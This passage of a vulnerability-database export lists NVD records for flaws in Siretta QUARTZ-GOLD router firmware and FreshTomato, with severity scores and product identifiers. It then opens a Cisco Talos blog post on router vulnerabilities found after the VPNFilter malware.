"impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38088"], "modified": "2023-02-02T17:22:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-38088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38088", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:06:18", "description": "An OS command injection vulnerability exists in the httpd logs/view.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T11:15:00", "type": "cve", "title": "CVE-2022-42484", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42484"], "modified": "2023-02-06T21:51:00", "cpe": ["cpe:/o:freshtomato:freshtomato:2022.5", "cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-42484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42484", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*", "cpe:2.3:o:freshtomato:freshtomato:2022.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:03:07", "description": "A directory traversal vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary file deletion. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-41154", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41154"], "modified": "2023-02-06T17:29:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-41154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41154", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:06:20", "description": "Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_INFO command.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-42493", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42493"], "modified": "2023-02-06T17:28:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-42493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42493", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:56:31", "description": "A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-38459", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38459"], "modified": "2023-02-02T17:22:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-38459", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38459", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:56:57", "description": "A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-38715", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38715"], "modified": "2023-02-02T17:22:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-38715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38715", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:55:36", "description": "An OS command injection vulnerability exists in the httpd SNMP functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP response can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-38066", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38066"], "modified": "2023-02-02T17:22:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-38066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38066", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:52:18", "description": "A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-36279", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36279"], "modified": "2023-02-02T17:23:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-36279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36279", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:02:49", "description": "Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'no wlan filter mac address WORD descript WORD' command template.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-41030", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41030"], "modified": "2023-02-06T17:29:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-41030", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:00:50", "description": "An OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-40220", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40220"], "modified": "2023-02-02T17:20:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-40220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40220", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:02:42", "description": "Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the '(ddns1|ddns2) hostname WORD' command template.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-40985", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40985"], "modified": "2023-02-03T16:27:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-40985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40985", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:56:29", "description": "A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-30T11:15:00", "type": "cve", "title": "CVE-2022-38451", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38451"], "modified": "2023-02-06T21:53:00", "cpe": ["cpe:/o:freshtomato:freshtomato:2022.5", "cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-38451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38451", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*", "cpe:2.3:o:freshtomato:freshtomato:2022.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:02:12", "description": "A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-40701", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40701"], "modified": "2023-02-02T17:19:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-40701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40701", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:57:30", "description": "A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-39045", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-39045"], "modified": "2023-02-02T17:21:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-39045", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-39045", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:05:10", "description": "A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-41991", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41991"], "modified": "2023-02-06T17:28:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-41991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41991", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}], "talosblog": [{"lastseen": "2023-08-06T21:25:55", "description": "* Since [the discovery of the widespread VPNFilter malware in 2018](<https://blog.talosintelligence.com/vpnfilter/>), Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.\n * During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.\n * Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.\n * There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.\n![The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter](https://blog.talosintelligence.com/content/images/2023/08/router-security-blog.jpg)\n\nSmall office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. \n\nIn 2018, Talos uncovered and published an article about the [VPNFilter malware](<https://blog.talosintelligence.com/vpnfilter/>) aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post [discussing our concern by an increase in state-sponsored campaigns targeting network infrastructure](<https://blog.talosintelligence.com/state-sponsored-campaigns-target-global-network-infrastructure/>). Microsoft discussed state-sponsored[ actors using SOHO routers](<https://www.microsoft.com/en-us/security/blog/2022/11/10/microsoft-threat-intelligence-presented-at-cyberwarcon-2022/>) to obfuscate their operations at CyberWarCon 2022. While Lumen recently highlighted that [criminal actors are also targeting SOHO routers](<https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/>) to support their operations\n\nThe Talos Vulnerability Discovery and Research Team -- our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware -- made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors. \n\nSince VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate [Snort network intrusion detection coverage](<https://snort.org/advisories>) and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using 